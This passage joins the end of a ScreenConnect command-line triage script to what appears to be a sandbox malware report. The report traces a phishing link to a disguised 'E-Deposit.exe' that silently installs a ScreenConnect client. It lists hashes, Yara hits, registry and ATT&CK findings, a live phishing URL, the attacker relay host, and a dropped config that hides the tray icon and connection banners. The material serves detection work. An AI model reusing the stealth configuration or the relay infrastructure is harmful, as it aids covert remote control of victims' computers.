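    '"?e=access&y=guest&h=slplegalfinance.com&p=443'
    '&s=316b6739-92f5-44b7-a8b7-61cbbec9d115&k=bgiaaackaabsu0exaagaaa%2fdmahacpw1tkv%2f%2bw18"'
)

if __name__ == "__main__":
    r = triage(SAMPLE)
    print("instance tag:", r["instance_tag"])
    print("relay:", r["params"]["h"], "port:", r["params"]["p"], "session:", r["params"]["s"])
    for f in r["findings"]:
        print("-", f)
```

Feed it the command-line field of process-creation telemetry (Sysmon event 1, Security event 4688 with command-line auditing enabled, or an EDR process table) filtered on image names ending in screenconnect.clientservice.exe; the allowlist miss on the relay host is the signal, the Access session type is the corroboration.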

                      Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct' (3 identical entries)
Source: Yara match, File source: C:\Users\user\Downloads\Unconfirmed 367452.crdownload, type: DROPPED
Source: Yara match, File source: 0000000E.00000002.1255943146.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001B.00000000.1289665825.00000000005B2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.1258853772.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000000.1231145401.0000000000636000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.1247162256.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\Windows\Temp\~DFB71A7B35B829F0DC.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF9CBAF1865D94B65A.TMP, type: DROPPED
Source: Yara match, File source: C:\Windows\Temp\~DF32625EBD992E86ED.TMP, type: DROPPED
Source: Yara match, File source: C:\Config.Msi\506f30.rbs, type: DROPPED
Source: Yara match, File source: C:\Windows\Installer\MSI71A0.tmp, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match, File source: 0000001B.00000002.1502008408.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Mitre Att&ck Matrix (a leading number is the count of signatures mapped to that technique; techniques without a number had no matching signature)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: 1 Replication Through Removable Media | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 1 Windows Management Instrumentation | 1 Command and Scripting Interpreter | At | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 1 Component Object Model Hijacking | 2 Windows Service | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 1 Component Object Model Hijacking | 2 Windows Service | 11 Process Injection | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | RC Scripts | Startup Items
Defense Evasion: 22 Masquerading | 21 Disable or Modify Tools | 51 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Rundll32 | 1 DLL Side-Loading | 1 File Deletion
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 13 Security Software Discovery | 1 Process Discovery | 51 Virtualization/Sandbox Evasion | 11 Peripheral Device Discovery | 1 File and Directory Discovery | 23 System Information Discovery | Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Command and Control: 2 Encrypted Channel | 1 Non-Application Layer Protocol | 2 Application Layer Protocol | Protocol Impersonation | Fallback Channels | Multiband Communication | Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery

Source | Detection | Scanner | Label
https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188 | 0% | Avira URL Cloud | safe
Source | Detection | Scanner | Label
C:\Users\user\Downloads\E-Deposit.exe (copy) | 26% | ReversingLabs | Win32.Exploit.ScreenConnectTool
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs |
C:\Windows\Installer\MSI71C1.tmp | 0% | ReversingLabs |
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 3.5.28.39 | true | false | | high
bitbucket.org | 185.166.143.48 | true | false | | high
slplegalfinance.com | 185.143.228.176 | true | false | | unknown
westcommerce.com.br | 50.116.112.103 | true | false | | unknown
baconredirects-elb-ymx6i3lu5f0j-2055456940.ap-south-1.elb.amazonaws.com | 13.126.216.240 | true | false | | unknown
fub.direct | 18.172.112.30 | true | false | | unknown
www.google.com | 142.250.186.132 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
g248jqtc.r.ap-south-1.awstrack.me | unknown | unknown | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.46 | unknown | United States | 15169 | GOOGLEUS | false
142.250.185.67 | unknown | United States | 15169 | GOOGLEUS | false
3.5.28.39 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
18.172.112.30 | fub.direct | United States | 3 | MIT-GATEWAYSUS | false
50.116.112.103 | westcommerce.com.br | United States | 46606 | UNIFIEDLAYER-AS-1US | false
185.143.228.176 | slplegalfinance.com | Germany | 61317 | ASDETUKhttpwwwheficedcomGB | false
64.233.167.84 | unknown | United States | 15169 | GOOGLEUS | false
13.126.216.240 | baconredirects-elb-ymx6i3lu5f0j-2055456940.ap-south-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
142.250.186.132 | www.google.com | United States | 15169 | GOOGLEUS | false
23.56.254.164 | unknown | United States | 42961 | GPRS-ASZAINKW | false
IP: 192.168.2.17, 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584783
Start date and time: 2025-01-06 14:00:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.evad.win@42/51@13/45
• Exclude process from analysis (whitelisted): TextInputHost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.186.46, 64.233.167.84, 142.250.185.238, 142.250.181.238
• Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):219736
                                        Entropy (8bit):6.581722481958688
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E6D01C853986F4CEBD80706D15CDE90F
                                        SHA1:84807A4A07FF569F4D560E44BE04FB91EE15A823
                                        SHA-256:6CE667027FF7D76ABD5F6072407B4BE998698D53EC205E9667070F00ADD99C78
                                        SHA-512:E239143C213FA960C0F876FAB1C6D2114462A6CF74E4589E3D4829B58F2181B9C62CAE3F3A78E9A5B56824B95678E365E911E2859F9482B930F1CDCAFE7614D7
                                        Malicious:false
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\506f30.rbs, Author: Joe Security
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\506f30.rbs, Author: Joe Security
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):347
                                        Entropy (8bit):4.803780834806902
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EC6BAD264881A1AE9D05F73712399809
                                        SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                        SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                        SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                        Malicious:false
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5733
                                        Entropy (8bit):4.54751304306711
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6F99B6E5484B5785AB7BF8E46882205A
                                        SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                        SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                        SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                        Malicious:false
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):50133
                                        Entropy (8bit):4.759054454534641
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                        Malicious:false
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):26722
                                        Entropy (8bit):7.7401940386372345
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                        Malicious:false
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):197120
                                        Entropy (8bit):6.586775768189165
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):68096
                                        Entropy (8bit):6.06942231395039
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):95512
                                        Entropy (8bit):6.504684691533346
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:75B21D04C69128A7230A0998086B61AA
                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1721856
                                        Entropy (8bit):6.639085961200334
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):260168
                                        Entropy (8bit):6.416438906122177
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                        SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                        SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                        SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):61208
                                        Entropy (8bit):6.310126082367387
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):602392
                                        Entropy (8bit):6.176232491934078
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):266
                                        Entropy (8bit):4.842791478883622
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                        Malicious:false
                                        Reputation:unknown
                                         Preview:
                                         <?xml version="1.0" encoding="utf-8"?>
                                         <configuration>
                                           <startup>
                                             <supportedRuntime version="v4.0" />
                                             <supportedRuntime version="v2.0.50727" />
                                           </startup>
                                           <runtime>
                                             <generatePublisherEvidence enabled="false" />
                                           </runtime>
                                         </configuration>
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):842248
                                        Entropy (8bit):6.268561504485627
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BE74AB7A848A2450A06DE33D3026F59E
                                        SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                        SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                        SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):81688
                                        Entropy (8bit):5.8618809599146005
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                        SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                        SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                        SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):951
                                        Entropy (8bit):4.682753739900415
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A86EDEABE4F506104C9B4A70EC058203
                                        SHA1:90F2C46B4C7EA592EE2027CBE85239878B21CD65
                                        SHA-256:1559FF67FB04A2DEB98A1733D1E1B61DD48D406CF70A0A1D2F386EE65ACD805E
                                        SHA-512:B5261E93D9DD436B885661E57AA2F75654B50675DDF8DEA06AEF0DB0E02AD9194A80DFFAB93A7FDC10B20EB1A1AF36E80E8C4069F7004BD5C69DB675CA17DCA2
                                        Malicious:false
                                        Reputation:unknown
                                         Preview:
                                         <?xml version="1.0"?>
                                         <configuration>
                                           <configSections>
                                             <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />
                                           </configSections>
                                           <ScreenConnect.ApplicationSettings>
                                             <setting name="AccessShowUnderControlBanner" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                             <setting name="AccessShowBalloonOnConnect" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                             <setting name="ShowBalloonOnConnect" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                             <setting name="AccessShowBalloonOnHide" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                             <setting name="AccessShowSystemTrayIcon" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                             <setting name="ShowSystemTrayIcon" serializeAs="String">
                                               <value>false</value>
                                             </setting>
                                           </ScreenConnect.ApplicationSettings>
                                         </configuration>
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):956
                                        Entropy (8bit):5.7620094502294785
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5BEECFFFFC74F49700D1EAC5A1AC5545
                                        SHA1:F7FFBDC8E37A62B480DDD3D04A52F8A3418D5F20
                                        SHA-256:257FA1FF9F14E80025ACBEA5CEB1EE308C32A948289361F8DCDA666C82B8FB82
                                        SHA-512:B0E447C5062116E2B1F6AB5E619D095B63E85076F83E912BF038CEB6DC7984F0E5FF0FF26FFABE5ABD5CCEAE498B1562EB63784A8C019551FAAD3B828FEFBC85
                                        Malicious:false
                                        Reputation:unknown
                                         Preview:
                                         <?xml version="1.0" encoding="utf-8"?>
                                         <configuration>
                                           <configSections>
                                             <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
                                           </configSections>
                                           <ScreenConnect.ApplicationSettings>
                                             <setting name="ClientLaunchParametersConstraint" serializeAs="String">
                                               <value>?h=slplegalfinance.com&amp;p=443&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv</value>
                                             </setting>
                                           </ScreenConnect.ApplicationSettings>
                                         </configuration>
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.40699615915369003
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A940A3E4D46982A6327F2BD0FFE9BBA1
                                        SHA1:0D6BF61C7937BAAFFED1503088DB6B5318FA1FDB
                                        SHA-256:13B89A62C9126BD2C5FA4A6ACC086A9F8E7F13E3044B485E66714A731E2CB9C8
                                        SHA-512:C6E76F14FD83BD3E2C4ABFFA04EF6227C97A0E53CBE33AD9E35F7729B93AFD347E459F622062EB532FF3FE9C53FB25D9CB7C9EE402E6FD5D82F1B1C662578C0B
                                        Malicious:false
                                        Reputation:unknown
                                         Preview: (binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07727367908817023
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CD8F9CCD542AA2FFE6E1C017D91A211E
                                        SHA1:5D660FB2F5FB4D7B5B820AA132D532333B0E084F
                                        SHA-256:C40F13D8B94F5DFE3155BF76C32D06B8411369786EBF2E7E2ECEB521F322677B
                                        SHA-512:4E775E6010CE94E93F2594C9EF8D0BB9EA90E4BC9EA92A2BDA50C210463CF3B3646F776B8D13AF487BFCCA7813C42A4698BADF121B44582442397618708BECD1
                                        Malicious:false
                                        Reputation:unknown
                                         Preview:
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                        Category:dropped
                                        Size (bytes):1088392
